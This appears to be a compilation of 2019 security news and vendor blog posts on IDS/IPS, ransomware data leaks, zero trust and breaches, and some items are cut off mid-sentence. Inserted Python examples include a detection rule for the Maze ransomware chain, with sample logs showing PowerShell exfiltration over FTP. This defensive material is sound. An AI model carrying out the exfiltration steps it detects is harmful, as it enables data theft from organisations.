The cybersecurity of a company is heavily reliant upon the skills and knowledge of the people who install, manage, and operate its security products. This means that recruiting and nurturing the best security team possible should be a CISO's top priority. Cynet's Ultimate Cybersecurity Job Posting Templates (download here) provide a list of the main responsibilities and skills for typical

7 ‘crackpot’ technologies that might transform IT

Innovation is the cornerstone of technology. In IT, if you’re not experimenting with a steady stream of emerging technologies, you risk disruption. Moreover, you can find yourself challenged when it comes to luring top talent and keeping ahead of competitors.

But knowing which bets to place when it comes to adopting emerging technologies can seem impossible. After all, most fizz out, and even those that do prove worthwhile often fall a little short of their hyped potential. Plus, most of what has most recently been considered cutting-edge today, such as artificial intelligence and machine learning, is already finding its way into production systems. You have to look far ahead sometimes to anticipate the next wave coming. And the farther out you look, the more risky the bets become.


How do Intrusion Detection/Prevention Systems work?

Enterprises mainly use two types of systems to deal with network intrusions – Intrusion Detection System (IDS) and Intrusion Prevention System (IPS). While the two systems are primarily similar, it is important to understand the major aspects which distinguish them.

Intrusion Detection Systems (IDS) monitor and analyze events on the network to detect possible intrusions or violations of security policy. This is mainly a reactive process: all incoming and outgoing network activity is monitored, and any sign of an intrusion that could jeopardize the business is flagged. Its main function is to raise an alert when it discovers such activity, which is why it is commonly known as a passive monitoring system.

IDS uses the following techniques to detect attacks –

Signature-Based Detection

With this method, the IDS detects an attack by matching observed events against patterns or signatures that correspond to known types of attack. For example, the IDS would flag an email with a subject line like ‘Free pics’ because it is a known signature of malware. This kind of detection is effective against known attacks whose signatures are recorded in the system.

Anomaly-Based Detection

In anomaly-based detection, the IDS compares network activity against a profile of normal activity and flags activity that deviates from that profile. For example, the IDS will detect an incident when it observes a data flow on the network that is considerably larger than the normal pattern. However, with this method the profile must be continuously updated, or false positives will occur.
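The two detection techniques just described, as an added illustration that is not Seqrite's code: a signature matcher over event fields (including the ‘Free pics’ subject line from the text) and an anomaly detector that keeps a profile of normal bytes per interval and flags intervals far above it. The rule names, the second signature and the baseline numbers are constructed.

```python
"""Signature-based and anomaly-based detection over constructed events.
Added illustration of the two IDS techniques above; not Seqrite's code."""
import re
import statistics

# Constructed signature rules: which event field to inspect and the known-bad pattern.
SIGNATURES = [
    {"name": "suspicious-mail-subject", "field": "subject",
     "pattern": re.compile(r"^\s*free pics\s*$", re.IGNORECASE)},
    {"name": "executable-attachment", "field": "attachment",
     "pattern": re.compile(r"\.(exe|scr)$", re.IGNORECASE)},
]


def signature_matches(event):
    """Return the names of every signature whose pattern matches its event field.
    Known attacks are caught reliably; anything without a signature is missed."""
    hits = []
    for sig in SIGNATURES:
        value = event.get(sig["field"], "")
        if sig["pattern"].search(value):
            hits.append(sig["name"])
    return hits


class VolumeAnomalyDetector:
    """Profile of normal bytes per interval; an interval more than k standard
    deviations above the mean is flagged. The profile is updated only with intervals
    judged normal, so a sustained attack does not quietly become the new baseline;
    the price is that a stale profile produces false positives when usage grows."""

    def __init__(self, baseline, k=3.0):
        self.samples = list(baseline)  # constructed bytes-per-interval history
        self.k = k

    def threshold(self):
        mean = statistics.fmean(self.samples)
        sd = statistics.pstdev(self.samples)
        return mean + self.k * max(sd, 1.0)  # floor the spread so a flat baseline still works

    def observe(self, total_bytes):
        """Return True if this interval is anomalous; otherwise fold it into the profile."""
        anomalous = total_bytes > self.threshold()
        if not anomalous:
            self.samples.append(total_bytes)
        return anomalous


if __name__ == "__main__":
    print(signature_matches({"subject": "Free Pics", "attachment": "photo.jpg"}))
    det = VolumeAnomalyDetector([1000, 1100, 950, 1050, 1000])
    print(det.observe(1080), det.observe(50000))
```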

Intrusion Prevention Systems (IPS) are a step forward from IDS in terms of capabilities. Where IDS is a reactionary mechanism, IPS is proactive and attempts to go one step ahead of detection, actively seeking to prevent the detected threat from succeeding. It is an active control mechanism that monitors the network traffic flow. It identifies and averts vulnerability exploits in the form of malicious inputs that intruders use to interrupt and gain control of an application or a system.

IPS technologies attempt to stop a detected attack from succeeding through some of the below actions:

Terminating network connection

The IPS can attempt to stop a detected attack within the network by terminating the connection being used for the attack and blocking the offending account's access to the target.

Automating security controls

On detecting an attack or vulnerabilities within a host, an IPS can attempt to prevent damage by applying preset automated security controls, such as downloading patches or reconfiguring firewall settings.

Attempt to make the attack benign

An IPS can attempt to tackle an attack by trying to make it benign, like removing a malicious attachment from a mail.

Seqrite’s Unified Threat Management (UTM) offers a one-stop solution for all enterprise security needs which includes intrusion detection and prevention as a standard feature.

UTM’s in-built IDS and IPS components keep enterprises safe by:

  • Monitoring, evaluating and catching threats in real-time
  • Preventing Denial of Service (DoS)/Distributed Denial of Service (DDoS) attacks
  • Preventing the discovery of open ports by attackers

Seqrite UTM’s IPS acts as a security barrier against unwanted intrusions into your network and forestalls a broad range of DoS and DDoS attacks before they penetrate the network. Deploying this level of protection can benefit an enterprise in various ways, including:

  • Providing a snapshot of network security at one glance
  • Protection of enterprise assets within the network
  • Triggers raised on detection of any suspected breach or activity in the network
  • A holistic approach towards prevention of intrusions

The post How do Intrusion Detection/Prevention Systems work? appeared first on Seqrite Blog.

Hacker Who Tried to Blackmail Apple for $100,000 Sentenced in London

A 22-year-old man who claimed to have access to over 300 million iCloud accounts and threatened to factory reset all of them unless Apple paid a ransom has pleaded guilty in London to trying to blackmail Apple. In March 2017, Kerem Albayrak from North London claimed to be a spokesman for a hacking group called the "Turkish Crime Family" and to be in possession of 319 million iCloud accounts.

Weekly Update 170

Monday: 40C and lapping up the Gold Coast sunshine. Wednesday: -8C and lapping up... Juicy IPA! I'm back in Oslo and catching up with the locals including running a roundtable discussion for CSOs at Microsoft, visiting the Norwegian National Cyber Security Centre (recently onboarded to HIBP) and chatting with Forbrukerrådet, the Norwegian Consumer Council. Plus, there's an all new blog post on the long-overdue update to Scott Helme's and my little Why no HTTPS? project.


  1. Forbrukerrådet does some excellent work identifying risks to consumers (link to their findings from a couple of years ago around kids' tracking watches)
  2. Still why no HTTPS? There's still a heap of websites that need to lift their HTTPS game (see if you can lean on the biggest ones in your country)
  3. You can grab all the raw data for the aforementioned site from (there's actually some really interesting stats in there, especially those sites with certs expiring in less than 24 hours)
  4. Sponsored by Varonis. Free Video Course: 7 Hidden Office 365 Security Settings You Can Only Unlock with PowerShell

Hackers Behind GozNym Malware Sentenced for Stealing $100 Million

Three members of an international organized cybercrime group that was behind a multi-million dollar theft primarily against U.S. businesses and financial institutions have been sentenced to prison, the U.S. Justice Department announced. The criminals used the GozNym banking Trojan to break into more than 4,000 victim computers globally, primarily in the United States and Europe, between 2015

Selling Privacy: The Next Big Thing for Entrepreneurs

Black Friday and Cyber Monday made clear that the online-offline divide in consumers’ minds has almost disappeared. Among the big winners for sales in 2019 will be a device that is perhaps the best physical representation of that diminishing online-offline divide: the digital assistant.

The main contenders for consumer dollars this year come by way of Amazon, Google, and Apple.

Amazon Echo smart home products have been among the company’s most popular items for a while now, but they hit new records in the recent four-day stretch from Black Friday to Cyber Monday. Internet connectivity continues its march to omnipresence in everyday consumer goods.

Televisions feature built-in internet functionality, and the FBI just released a warning about them.

A number of the newer TVs also have built-in cameras. In some cases, the cameras are used for facial recognition so the TV knows who is watching and can suggest programming appropriately. There are also devices coming to market that allow you to video chat with Grandma in 42″ glory.

Beyond the risk that your TV manufacturer and app developers may be listening to and watching you, that television can also be a gateway for hackers to come into your home. A bad cyber actor may not be able to access your locked-down computer directly, but it is possible that your unsecured TV can give him or her an easy way in the backdoor through your router.

Hackers can also take control of your unsecured TV. At the low end of the risk spectrum, they can change channels, play with the volume, and show your kids inappropriate videos. In a worst-case scenario, they can turn on your bedroom TV’s camera and microphone and silently cyberstalk you.

The conveniences afforded by all this new connected technology are great, but it’s important to bear in mind that it also has its downside.

Even basic home goods like doorbells and light bulbs are commonly being sold with Wi-Fi connectivity and the ability to integrate into Google Home-, Siri-, or Alexa-enabled networks. These devices don’t just talk to one another. They’re also providing the companies that manufactured them with a gold mine of data about how they’re being used–and, increasingly, who is using them.

It’s not just IoT gadgets. Tech companies are busy these days trying to weave their way into your wallet, your entertainment, and your health, all the while mining as much data as possible to leverage into other markets and industries.

This has an air of inevitability about it because the right entrepreneur has not yet had the right aha! moment to make it stop being an issue. That said, cracks in the current personal information smash-and-grab approach to consumer data are beginning to appear, and consumers are becoming increasingly wary of how their data is being collected and used as well as who has access to it.

Break Out the Torches and Pitchforks

If a consumer revolt sounds overly optimistic, consider the uproar earlier this year over revelations that smart home speakers were eavesdropping consistently and sometimes indiscriminately on consumers, and the resulting semi-apologies issued by Apple, Amazon, and Google.

Or look at the ongoing civil rights concerns regarding Amazon’s Ring surveillance cameras, or the recent lawsuit against TikTok for allegedly offloading user data to China, or the reports of customers abandoning their Fitbits after the company was acquired by Google.

The message seems clear to me. Consumers may enjoy the convenience and easy access to the internet, but more and more they bristle at the lack of transparency when it comes to the way their data is being handled and used by third parties, and the seeming inevitability that it will wind up on an unsecured database for any and all to see.

While the fantasy of consumers uninstalling and unplugging en masse is common among a small community of sentient eels indigenous to the Malarkey Marshes of Loon Lake, there remains a business opportunity for the larger online community.

Will the Genius of Loon Lake Please Stand Up?

The effort to create a more privacy- and security-centric internet experience for consumers has largely been led by nonprofit organizations. World Wide Web inventor Tim Berners-Lee has been publicly discussing plans to create a follow-up with the aim of reverting to its original ideals of an open and cooperative global network with built-in privacy protections.

Meanwhile, the nonprofit Mozilla organization has revamped its Firefox browser to block several types of ad trackers by default and provide greater security for saved passwords and account information, in addition to publishing an annual guide to score internet-connected devices for their relative privacy friendliness and security. Wikipedia founder Jimmy Wales announced in November a service meant to provide an alternative to Twitter and Facebook reliant on user donations rather than the other social platforms’ often Orwellian ad tracking software.

Without a user base or killer app to drive adoption, Berners-Lee’s new web has been in the works for years, and Wales’s idea is a rehashing of a similar project called WikiTribune that also never managed to find its footing. Firefox is a quality browser, but its market share pales next to Google Chrome’s.

Thus far, nonprofit-driven alternatives have found no lure to drive consumer adoption. The next stage of privacy-centric development may need to have a profit motive to make inroads into the privacy protocols and proxies that dominate apps and devices. It can’t be merely self-sustaining, but rather must be compelling for users, developers, and engineers. One such company, Nullafi, has the right idea: anonymizing and individualizing a user’s most common digital identifier by creating email burners that redirect to the user’s private account. (Full disclosure: I’m an investor.) We need to see more of this kind of development, and we need to see it get adopted.

The current large-scale investment in cybersecurity proves there’s a market in our post-Equifax-breach world where awareness of data vulnerability and the possibility of getting hacked have hit critical mass. The time for the unicorns to arrive is now.

The post Selling Privacy: The Next Big Thing for Entrepreneurs appeared first on Adam Levin.

Cisco ASA DoS Bug Attacked in Wild

This post was authored by Nick Biasini.

Cisco Talos has recently noticed a sudden spike in exploitation attempts against a specific vulnerability in our Cisco Adaptive Security Appliance (ASA) and Firepower Appliance. The vulnerability, CVE-2018-0296, is a denial-of-service and information disclosure directory traversal bug found in the web framework of the appliance. The attacker can use a specially crafted URL to cause the ASA appliance to reboot or disclose unauthenticated information.

This vulnerability was first noticed being exploited publicly back in June 2018, but it appeared to increase in frequency in the past several days and weeks. As such, we are advising all customers to ensure they are running a non-affected version of code. Additionally, we want to highlight that there is a Snort signature in place to detect this specific attack (46897). Concerned customers should ensure it is enabled in applicable policies that could detect this exploitation attempt.

The post Cisco ASA DoS Bug Attacked in Wild appeared first on Cisco Blogs.

Threat Roundup for December 13 to December 20

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between Dec 13 and Dec 20. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, or

Read More


TRU12202019 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

The post Threat Roundup for December 13 to December 20 appeared first on Cisco Blogs.

Maze Ransomware Operators Publish User Information

As if it wasn't hard enough to have their data encrypted, businesses that fell victim to Maze ransomware are now facing another threat: their data could become public.

Maze's operators have been collecting data from victim organisations for a while, using it as leverage until payment is received to decrypt the files. Now, for all those victims who refuse to pay the ransom, they threaten to release the data.

In this respect, a website was created by the threat actor where they identified the names and websites of eight businesses who allegedly refused to pay the sum demanded to retrieve their records.

According to technology journalist Brian Krebs, even though the event did not make news, at least one of the businesses on that list was actually targeted by Maze ransomware.

The Maze operators publish data on that page, such as the initial date of contamination, certain compromised records (office, text and PDF files), the overall volume of data allegedly obtained from the company, and the IP addresses and computer names of the infected servers.

The step is not shocking, particularly since the people behind Maze have been engaging in exfiltrating victim details for a while now and are also threatening to publicly disclose that information if the victim does not pay the demanded ransom.

In one intrusion in which Maze ransomware was deployed, the attackers first used Cobalt Strike after gaining access to the network, collecting information about the environment before moving laterally. They also used a technique commonly associated with the Russian threat actor Cozy Bear.

The hackers then began using PowerShell to exfiltrate data and connect to a remote FTP server. They only implemented Maze ransomware after this phase was done to encrypt the data of the victim.

Cobalt Strike was used again after the original breach in another event that Cisco Talos attributed to the same perpetrator, and PowerShell was used to dump large amounts of data using FTP. Without making the information available, the attackers then demanded payment.

The two incidents are primarily linked through the command and control (C&C) infrastructure used (the data was deposited to the same server as in the previously mentioned incident), the use of 7-Zip to compress the collected data, interactive logins through Windows Remote Desktop Protocol, and remote execution of PowerShell.
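The chain just described (interactive RDP logon, remotely executed PowerShell, 7-Zip archive creation, PowerShell reaching an FTP server) is far more telling when the stages are correlated per host than when each is alerted on alone. The following correlation rule is an added example for this post, not Talos code; the pipe-delimited telemetry format, host names, user names and addresses are constructed for the example, and a real deployment would read Sysmon and Security events from a SIEM instead.

```python
"""Correlate host telemetry for the staging-and-exfiltration chain described
above. Constructed example: the log layout is
timestamp|host|source|event_id|parent>image|detail and all values are made up."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry (not from any real incident).
# HOST-A shows all four stages within 21 minutes; HOST-B shows benign look-alikes
# (7-Zip extracting a download, PowerShell talking HTTPS).
SAMPLE_LOG = r"""
2019-12-18T02:10:11Z|HOST-A|security|4624|-|logon_type=10 user=svc_backup src=10.0.5.23
2019-12-18T02:14:05Z|HOST-A|sysmon|1|C:\Windows\System32\wsmprovhost.exe>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -NoProfile -File C:\Users\Public\collect.ps1
2019-12-18T02:20:40Z|HOST-A|sysmon|1|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe>C:\Program Files\7-Zip\7z.exe|7z.exe a -mx1 C:\Users\Public\stage.7z C:\Shares\Finance
2019-12-18T02:31:02Z|HOST-A|sysmon|3|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|dst=203.0.113.45 dport=21
2019-12-18T09:02:00Z|HOST-B|sysmon|1|C:\Windows\explorer.exe>C:\Program Files\7-Zip\7z.exe|7z.exe x C:\Users\alice\Downloads\report.7z
2019-12-18T09:05:13Z|HOST-B|sysmon|3|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|dst=198.51.100.7 dport=443
"""

# One predicate per stage. Security 4624 / logon type 10 is a RemoteInteractive (RDP)
# logon; Sysmon event 1 is process creation, event 3 a network connection;
# wsmprovhost.exe is the WinRM host that spawns remotely executed PowerShell.
STAGES = {
    "rdp_interactive_logon": lambda e: e["source"] == "security" and e["event_id"] == "4624"
    and e["detail"].get("logon_type") == "10",
    "remote_powershell": lambda e: e["event_id"] == "1" and e["parent"].endswith("wsmprovhost.exe")
    and e["image"].endswith("powershell.exe"),
    "archive_staging": lambda e: e["event_id"] == "1" and e["image"].endswith("7z.exe")
    and e["argv"][1:2] == ["a"],          # "a" = add to archive; "x" (extract) is not staging
    "powershell_to_ftp": lambda e: e["event_id"] == "3" and e["image"].endswith("powershell.exe")
    and e["detail"].get("dport") == "21",
}


def parse_line(line):
    """Split one constructed telemetry line into a dict the predicates can read."""
    ts, host, source, event_id, image_field, detail = line.split("|", 5)
    parent, _, image = image_field.rpartition(">")
    kv = {}
    for tok in detail.split():
        if "=" in tok:
            k, v = tok.split("=", 1)
            kv[k] = v
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
        "host": host, "source": source, "event_id": event_id,
        "parent": parent.lower(), "image": image.lower(),
        "argv": detail.split(), "detail": kv,
    }


def correlate(log_text, window=timedelta(hours=2)):
    """Return {host: sorted stage names} for every host on which at least two
    distinct stages fired within `window` of each other."""
    hits = defaultdict(list)  # host -> [(timestamp, stage)]
    for line in log_text.strip().splitlines():
        event = parse_line(line)
        for name, pred in STAGES.items():
            if pred(event):
                hits[event["host"]].append((event["ts"], name))
    findings = {}
    for host, events in hits.items():
        events.sort()
        best = set()
        for i, (t0, _) in enumerate(events):
            in_window = {stage for t, stage in events[i:] if t - t0 <= window}
            if len(in_window) > len(best):
                best = in_window
        if len(best) >= 2:
            findings[host] = sorted(best)
    return findings


if __name__ == "__main__":
    for host, stages in correlate(SAMPLE_LOG).items():
        print(f"{host}: {len(stages)} stages of the staging/exfiltration chain: {', '.join(stages)}")
```

The single-stage predicates are deliberately loose (7-Zip and PowerShell are everywhere); the value is in requiring two or more stages on one host inside a time window, which is why HOST-B produces nothing.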

“The use of targeted ransomware attacks isn’t new and, unfortunately, it’s not going anywhere anytime soon. This is an extremely lucrative attack avenue for adversaries and as such, its popularity is likely only going to increase. What makes these particular attacks interesting is the additional monetization avenue of exfiltrating data in the process,” Talos points out.

The threat agent could demand more money from the victim with this data in hand, or could monetize it by selling it to other cyber criminals on dark web platforms. Not to mention that entities will pay for the damage incurred by their data being published.

“This trend of achieving maximum monetary gain for their nefarious activities is increasingly common in the crimeware space […]. Expect adversaries to be increasingly aware of the systems and networks they are compromising as all systems and networks are not created equally and some have much higher profit margins, when compromised,” Talos concludes.

The post Maze Ransomware Operators Publish User Information appeared first on .

The 3 W’s in Zero Trust Security

Picture this scenario: you are a security guard at an office building. Today you are looking after a restricted area. A person you’ve never seen before walks straight past you into one of the rooms. Would you stop them or would you just assume they are allowed to be there?

In a physical world, trust is most commonly based on who you are, not where you are. A savvy security guard would ask you for your ID before allowing you in. Virtually, though, the situation is different: being in the right place is often enough. If you are inside of a company’s network perimeter, it is often assumed you have the right to be there. You gain access to the same data and tools that any other trusted user would. It’s clear that such an approach is no longer enough.

Zero trust security comes in as an alternative model, more in line with the current threat landscape. It is based on the principle of “always check, never trust”, originally introduced by Forrester. It takes into account 3 main factors:

  • Workforce: Employees are at risk of identity theft, which is one of the most widespread types of fraud today.
  • Workload: New vulnerabilities in applications and their improper management open highways for cybercriminals.
  • Workplace: With more and more connected devices, the workspace has extended far beyond the four walls of your company building.

Moving from a perimeter model to Zero Trust means assessing, adapting and implementing new security policies that address threats in a constantly changing environment. In this trust-centric approach access is granted to users and devices, not a network.

What's different in a Zero-Trust Approach

This means that policies now need to be calculated based on a vast number of data sources. All network activities must be continuously taken into account. Any indications of compromise or changes in the behaviour of apps, users and devices must be examined, validated and receive immediate responses.

How to apply a Zero Trust model

Cisco’s practical approach to Zero Trust includes six important steps.

  1. Establish levels of trust for users and user devices (identity verification with multi-factor authentication and device status, which must be compliant and properly updated)
  2. Establish levels of reliability for IoT and/or workloads (profile and baseline)
  3. Establish SD perimeters to control access to the application (authorised access)
  4. Establish SD perimeters to control access to the network (segmentation and micro-segmentation)
  5. Automate the adaptive policy using normalisation (network, data centre and cloud)
  6. Automate the adaptive policy using the response to threats (adapt the level of trust)


Cisco Zero-Trust Model: Duo for Workforce, SD-Access for workplace and Tetration for Workload

Zero Trust Security involves people, processes and technology in its adoption. It can provide a roadmap for a truly efficient and automated security infrastructure.
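To make the six steps concrete, here is an added example (not Cisco code, and not how Duo, SD-Access or Tetration are implemented) of an adaptive access decision in which trust is derived from verified identity and device posture, lowered by active threat signals, and checked against the sensitivity of the workload. The users, devices, workloads, scoring weights and required-trust tiers are all assumptions made for the example; the one thing the policy deliberately ignores is whether the request comes from inside the corporate network.

```python
"""Adaptive, identity-and-device-centric access decision (constructed example)."""
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    name: str
    groups: frozenset
    mfa_verified: bool            # step 1: identity verified with MFA


@dataclass(frozen=True)
class Device:
    managed: bool                 # step 1: device status (compliant, updated)
    os_patched: bool
    disk_encrypted: bool


@dataclass(frozen=True)
class Workload:
    name: str
    sensitivity: int              # step 2: 1 = public, 2 = internal, 3 = restricted
    allowed_groups: frozenset


# Assumed policy weights: minimum trust score per sensitivity tier.
REQUIRED_TRUST = {1: 2, 2: 4, 3: 5}
MAX_TRUST = 5


def trust_level(user, device, threat_signals=()):
    """Steps 1, 2 and 6: score identity and device posture, then lower the
    score for every active threat signal (adapting the level of trust)."""
    score = 2 if user.mfa_verified else 0
    score += 1 if device.managed else 0
    score += 1 if device.os_patched else 0
    score += 1 if device.disk_encrypted else 0
    score -= 2 * len(threat_signals)
    return max(0, min(MAX_TRUST, score))


def decide(user, device, workload, threat_signals=(), on_corporate_lan=False):
    """Steps 3 and 4: gate the application on entitlement and trust level.
    Returns (verdict, reasons). Network location is accepted only to record
    that it carries no weight."""
    reasons = []
    if on_corporate_lan:
        reasons.append("request from corporate LAN: location carries no weight")
    if not user.groups & workload.allowed_groups:
        return "deny", reasons + [f"{user.name} not entitled to {workload.name}"]
    if threat_signals:
        reasons.append("active threat signals: " + ", ".join(threat_signals))
    score = trust_level(user, device, threat_signals)
    need = REQUIRED_TRUST[workload.sensitivity]
    if score >= need:
        return "allow", reasons + [f"trust {score} >= required {need}"]
    # Step-up only helps when MFA alone would close the gap.
    if not user.mfa_verified and score + 2 >= need:
        return "step_up_mfa", reasons + [f"trust {score} < {need}; MFA would satisfy policy"]
    return "deny", reasons + [f"trust {score} < required {need}"]


# Constructed sample principals and workloads.
FINANCE = frozenset({"finance"})
ALICE = User("alice", FINANCE, mfa_verified=True)
ALICE_NO_MFA = User("alice", FINANCE, mfa_verified=False)
BOB = User("bob", frozenset({"marketing"}), mfa_verified=True)
COMPLIANT = Device(managed=True, os_patched=True, disk_encrypted=True)
UNMANAGED = Device(managed=False, os_patched=True, disk_encrypted=False)
PAYROLL = Workload("payroll", sensitivity=3, allowed_groups=FINANCE)
INTRANET = Workload("intranet-news", sensitivity=1, allowed_groups=frozenset({"finance", "marketing"}))


def run_scenarios():
    """Verdicts for a handful of scenarios; being on the LAN never substitutes for MFA."""
    return {
        "lan_without_mfa": decide(ALICE_NO_MFA, COMPLIANT, PAYROLL, on_corporate_lan=True)[0],
        "remote_with_mfa": decide(ALICE, COMPLIANT, PAYROLL)[0],
        "remote_with_mfa_but_edr_alert": decide(ALICE, COMPLIANT, PAYROLL, threat_signals=("edr_malware_alert",))[0],
        "not_entitled": decide(BOB, COMPLIANT, PAYROLL)[0],
        "low_sensitivity_unmanaged": decide(ALICE, UNMANAGED, INTRANET)[0],
    }


if __name__ == "__main__":
    for name, verdict in run_scenarios().items():
        print(f"{name}: {verdict}")
```

The point of the threat-signal term is step 6: the same user on the same compliant device is allowed until an EDR alert appears, after which the trust score drops below the payroll threshold and the request is denied rather than stepped up, because the user had already completed MFA.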

Join us at Cisco CISO Day in Barcelona

We will cover zero trust security and other strategic topics at the “Cisco CISO Day“, an exclusive event for CISOs, taking place on 27 January 2020 in Barcelona at the Cisco Co-Innovation Center. It is a great opportunity to talk with colleagues and experts and find concrete answers to any burning security questions.




The post The 3 W’s in Zero Trust Security appeared first on Cisco Blogs.

This Week in Security News: Microsoft vs. Amazon in the Cloud and Escalated Risk in the Oil and Gas Industry

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about cybersecurity risk facing the oil and gas industry and its supply chain. Also, read about what Trend Micro’s CEO, Eva Chen, has to say about Microsoft and Amazon’s battle for cloud leadership.

Read on:

How to Get the Most Out of Industry Analyst Reports

In this video blog, Trend Micro’s Vice President of Cybersecurity, Greg Young, taps into his past experience at Gartner to explain how to discern the most value from industry analysts and help customers understand how to use the information.

Top Gun 51 Profile: Trend Micro’s Jeff Van Natter Sees Distributors as Key to Reaching New Partners

In an interview with Channel Futures, Trend Micro’s Jeff Van Natter explains why he believes distributors will continue to play an important role for Trend as it looks to expand its partner ecosystem.

How to Speed Up a Slow PC Running Windows OS

The first step to improving your Windows PC performance is to determine what’s causing it to run slow. In this blog, learn about eight tips on how to fix a slow PC running Windows and how to boost your PC’s performance.

We Asked 13 Software Execs Whether Microsoft Can Topple Amazon in the Cloud, and They Say There’s a Chance but It’ll Be a Hard Battle

Business Insider talked to 13 executives at companies that partner with Microsoft and Amazon on cloud platforms for their take on the rivalry between the two, and whether Microsoft can win. In this article, read about what Trend Micro CEO Eva Chen has to say about the rivalry.

DDoS Attacks and IoT Exploits: New Activity from Momentum Botnet

Trend Micro recently found notable malware activity affecting devices running Linux. Further analysis of the malware samples revealed that these actions were connected to a botnet called Momentum, which has been used to compromise devices and perform distributed denial-of-service (DDoS) attacks.

Oil and Gas Industry Risks Escalate, Cybersecurity Should Be Prioritized

The oil and gas industry and its supply chain face increased cybersecurity risks from advanced threat groups and others as they continue to build out digitally connected infrastructure, Trend Micro research reveals.

Christmas-Themed Shopping, Game and Chat Apps Found Malicious, Lure Users with Deals

Security researchers caution Android users when downloading apps for shopping, games, and Santa video chats as they found hundreds of malicious apps likely leveraging the season to defraud unwitting victims via command-and-control (C&C) attacks, adware or “excessive or dangerous combinations of permissions,” such as camera, microphone, contacts and text messages.

New Orleans Mayor Declares State of Emergency in Wake of City Cyberattack

New Orleans Mayor LaToya Cantrell declared a state of emergency last Friday after the city was hit by a cyberattack where phishing attempts were detected. Cantrell said the attack is similar to the July 2019 attack on the state level where several school systems in Louisiana were attacked by malware.

Credential Harvesting Campaign Targets Government Procurement Sites Worldwide

Cybersecurity company Anomali uncovered a campaign that used 62 domains and around 122 phishing sites in its operations and targeted government procurement services in 12 countries, including the United States, Canada, Japan, and Poland.

Schneider Electric Patches Vulnerabilities in its EcoStruxure SCADA Software and Modicon PLCs

Schneider Electric released several advisories on vulnerabilities they have recently fixed in their EcoStruxure and Modicon products. Modicon M580, M340, Quantum and Premium programmable logic controllers (PLCs) were affected by three denial of service (DoS) vulnerabilities.

FBot aka Satori is Back with New Peculiar Obfuscation, Brute-force Techniques

Trend Micro recently observed that the Mirai-variant FBot, also known as Satori, has resurfaced. Analysis revealed that this malware uses a peculiar combination of XOR encryption and a simple substitution cipher, which has not been previously used by other IoT malware variants. Additionally, the credentials are not located within the executable binary — instead, they are received from a command-and-control (C&C) server.

15 Cyber Threat Predictions for 2020

As 2020 nears, this article outlines the cyber threats that Trend Micro’s research team predicts will target organizations in the coming year, and why.

Negasteal/Agent Tesla Now Gets Delivered via Removable Drives, Steals Credentials from Becky! Internet Mail

Trend Micro recently spotted a Negasteal/Agent Tesla variant that uses a new delivery vector: removable drives. The malware also now steals credentials from the applications FTPGetter and Becky! Internet Mail.

Into the Battlefield: A Security Guide to IoT Botnets

The internet of things (IoT) has revolutionized familiar spaces by making them smarter. Homes, offices and cities are just some of the places where IoT devices have given better visibility, security and control. However, these conveniences have come at a cost: traditional cyberthreats also found a new arena for attacks and gave rise to realities like IoT botnets.


What’s your take on whether or not Microsoft can topple Amazon in the cloud? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Microsoft vs. Amazon in the Cloud and Escalated Risk in the Oil and Gas Industry appeared first on .

Apple Opens Its Invite-Only Bug Bounty Program to All Researchers

As promised by Apple in August this year, the company today finally opened its bug bounty program to all security researchers, offering monetary rewards to anyone for reporting vulnerabilities in the iOS, macOS, watchOS, tvOS, iPadOS, and iCloud to the company. Since its launch three years ago, Apple's bug bounty program was open only for selected security researchers based on invitation and

Cyber News Rundown: Honda Customer Data Leak


Honda Customer Database Exposed

Officials have been working over the past week to secure a database containing highly sensitive information belonging to more than 26,000 North American customers of the Honda motor company. The database in question was originally created in October and was only discovered on December 11. While no financial information was included in the leak, the records did contain names, VIN numbers, and service details for thousands of customers.

Boeing Contractor Data Leak

Nearly 6,000 defense contractors working for Boeing have had personal information leaked after a user error left an Amazon web service bucket publicly exposed. The 6,000 Boeing staff are only a small portion of the 50,000 individual records found on the leaked server, many of whom were involved in confidential projects for the Department of Defense. These types of data leaks are increasingly common as more users are not properly securing their servers or using any form of authentication.

Sextortion Email Campaign Shutdown

After months spent chasing them across Europe, authorities have arrested the authors responsible for the Nuclear Bot sextortion campaign. With their Nuclear Bot banking trojan, the team was able to compromise roughly 2,000 unique systems and use them to help distribute malicious emails. Though it’s been verified that the original authors are in custody, the source code for Nuclear Bot was made public in the hope no money would be made from its sale.

Emotet Sent from Phony German Authorities

A new email campaign has been disguising itself as several German government agencies and spreading the Emotet trojan, infecting multiple agency systems. This campaign differs from previous Emotet attacks by appearing as a reply from a prior email to appear more legitimate. To best defend against these attacks, users are strongly encouraged to check both the sender’s name and address as well as ensuring that macros aren’t enabled in their Office apps.

LifeLabs Pays Ransom After Cyber-Attack

Canadian testing company LifeLabs decided to pay a ransom after attackers illicitly accessed the sensitive information for all 15 million of its customers. Oddly, many of the records being found date back to 2016 or earlier and have yet to be identified on any illicit selling sites. LifeLabs has since contacted all affected customers and has begun offering identity monitoring services.

The post Cyber News Rundown: Honda Customer Data Leak appeared first on Webroot Blog.

Hackers Stole Customers’ Payment Card Details From Over 700 Wawa Stores

Have you stopped at any Wawa convenience store and used your payment card to buy gas or snacks in the last nine months? If yes, your credit and debit card details may have been stolen by cybercriminals. Wawa, the Philadelphia-based gas and convenience store chain, disclosed a data breach incident that may have exposed payment card information of thousands of customers who used their cards at

